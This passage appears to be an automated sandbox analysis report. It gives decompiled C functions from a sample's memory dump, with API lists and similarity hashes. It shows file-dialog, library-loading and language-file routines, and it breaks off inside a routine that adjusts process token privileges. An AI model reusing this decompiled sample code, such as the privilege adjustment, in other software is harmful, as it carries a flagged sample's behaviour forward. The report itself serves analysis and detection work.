                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                          				wchar_t* _v52;
                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                          				struct tagOFNA _v80;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v76 = __eax;
                                                                                                                                                                                                                          				_v68 = _a4;
                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                          				_v32 = _a8;
                                                                                                                                                                                                                          				_v20 = _a12;
                                                                                                                                                                                                                          				_v80 = 0x4c;
                                                                                                                                                                                                                          				_v56 = 1;
                                                                                                                                                                                                                          				_v52 = __esi;
                                                                                                                                                                                                                          				_v48 = 0x104;
                                                                                                                                                                                                                          				_v28 = 0x81804;
                                                                                                                                                                                                                          				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					wcscpy(__esi, _v52);
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileNameOpenwcscpy
                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                          • API String ID: 3246554996-2909332022
                                                                                                                                                                                                                          • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t10;
                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t13;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t13 = __eax;
                                                                                                                                                                                                                          				_t12 = 0;
                                                                                                                                                                                                                          				if(E00408F72(__eax) != 0) {
                                                                                                                                                                                                                          					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                                          						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: LookupAccountSidW$Y@
                                                                                                                                                                                                                          • API String ID: 190572456-2352570548
                                                                                                                                                                                                                          • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040AD85(intOrPtr _a4) {
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t3;
                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t8;
                                                                                                                                                                                                                          				char** _t9;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t7 = 0;
                                                                                                                                                                                                                          				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                                                                                                                          				 *_t9 = "SHAutoComplete";
                                                                                                                                                                                                                          				_t3 = GetProcAddress(_t8, ??);
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				FreeLibrary(_t8);
                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 4092907564-3792422438
                                                                                                                                                                                                                          • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00406597(wchar_t* __esi) {
                                                                                                                                                                                                                          				wchar_t* _t2;
                                                                                                                                                                                                                          				wchar_t* _t6;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t6 = __esi;
                                                                                                                                                                                                                          				E00404AD9(__esi);
                                                                                                                                                                                                                          				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return wcscat(_t6, L"_lng.ini");
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004065B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                          • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AC52() {
                                                                                                                                                                                                                          				struct HINSTANCE__* _t1;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t2;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101c4 == 0) {
                                                                                                                                                                                                                          					_t1 = E00405436(L"shell32.dll");
                                                                                                                                                                                                                          					 *0x4101c4 = _t1;
                                                                                                                                                                                                                          					if(_t1 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                                                                                                                          						 *0x4101c0 = _t2;
                                                                                                                                                                                                                          						return _t2;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                          • API String ID: 946536540-880857682
                                                                                                                                                                                                                          • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00406670(char** __esi, void* __eflags) {
                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                          				char** _t39;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t39 = __esi;
                                                                                                                                                                                                                          				 *__esi = "cf@";
                                                                                                                                                                                                                          				__esi[0xb8] = 0;
                                                                                                                                                                                                                          				_t30 = E00404FA4(0x338, __esi);
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				__esi[0xcb] = 0;
                                                                                                                                                                                                                          				__esi[0xa6] = 0;
                                                                                                                                                                                                                          				__esi[0xb9] = 0;
                                                                                                                                                                                                                          				__esi[0xba] = 0xfff;
                                                                                                                                                                                                                          				__esi[8] = 0;
                                                                                                                                                                                                                          				__esi[1] = 0;
                                                                                                                                                                                                                          				__esi[0xb7] = 1;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[2] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[3] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[4] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t39[5] = _t30;
                                                                                                                                                                                                                          				return _t39;
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                          				void** _t62;
                                                                                                                                                                                                                          				void** _t63;
                                                                                                                                                                                                                          				signed int* _t66;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t66 = __eax;
                                                                                                                                                                                                                          				_t32 = wcslen(_a4);
                                                                                                                                                                                                                          				_t48 =  *(_t66 + 4);
                                                                                                                                                                                                                          				_t58 = _t48 + _t32;
                                                                                                                                                                                                                          				_v12 = _t58;
                                                                                                                                                                                                                          				_t59 = _t58 + 1;
                                                                                                                                                                                                                          				_v8 = _t32;
                                                                                                                                                                                                                          				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                                                                                                                          				 *(_t66 + 4) = _t59;
                                                                                                                                                                                                                          				_t62 = _t66 + 0x10;
                                                                                                                                                                                                                          				if(_t59 != 0xffffffff) {
                                                                                                                                                                                                                          					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					free( *_t62);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t60 =  *(_t66 + 0x1c);
                                                                                                                                                                                                                          				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                                                                          				_t63 = _t66 + 0xc;
                                                                                                                                                                                                                          				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                                                                                                                          					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					free( *_t63);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                                                                                                                          				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                                                                                                                          				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                                                                                                                          				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                                                                                                                          				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                                                                                                                          				return _t30;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004054EC
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                                                                                                                            • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                            • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                            • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405556
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                          • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00405ADF() {
                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                          				signed int _t56;
                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t60 =  *0x41c470;
                                                                                                                                                                                                                          				if(_t60 == 0) {
                                                                                                                                                                                                                          					_t50 = 2;
                                                                                                                                                                                                                          					 *0x41c470 = 0x8000;
                                                                                                                                                                                                                          					_t27 = 0x8000 * _t50;
                                                                                                                                                                                                                          					 *0x41c474 = 0x100;
                                                                                                                                                                                                                          					 *0x41c478 = 0x1000;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c458 = _t27;
                                                                                                                                                                                                                          					_t52 = 4;
                                                                                                                                                                                                                          					_t29 =  *0x41c474 * _t52;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c460 = _t29;
                                                                                                                                                                                                                          					_t54 = 4;
                                                                                                                                                                                                                          					_t31 =  *0x41c474 * _t54;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c464 = _t31;
                                                                                                                                                                                                                          					_t56 = 2;
                                                                                                                                                                                                                          					_t33 =  *0x41c478 * _t56;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c45c = _t33;
                                                                                                                                                                                                                          					return _t33;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t25;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t16;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t18;
                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t22;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t24;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t35;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t37 = __eflags;
                                                                                                                                                                                                                          				_t35 = __eax;
                                                                                                                                                                                                                          				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t16 = E00408F72(_t35);
                                                                                                                                                                                                                          				__eflags = _t16;
                                                                                                                                                                                                                          				if(_t16 != 0) {
                                                                                                                                                                                                                          					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                                                                                                                          					__eflags = _t24;
                                                                                                                                                                                                                          					if(_t24 != 0) {
                                                                                                                                                                                                                          						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                          				_v12 = 2;
                                                                                                                                                                                                                          				_a4 = _v8;
                                                                                                                                                                                                                          				_t18 = E00408F72(_t35);
                                                                                                                                                                                                                          				__eflags = _t18;
                                                                                                                                                                                                                          				if(_t18 != 0) {
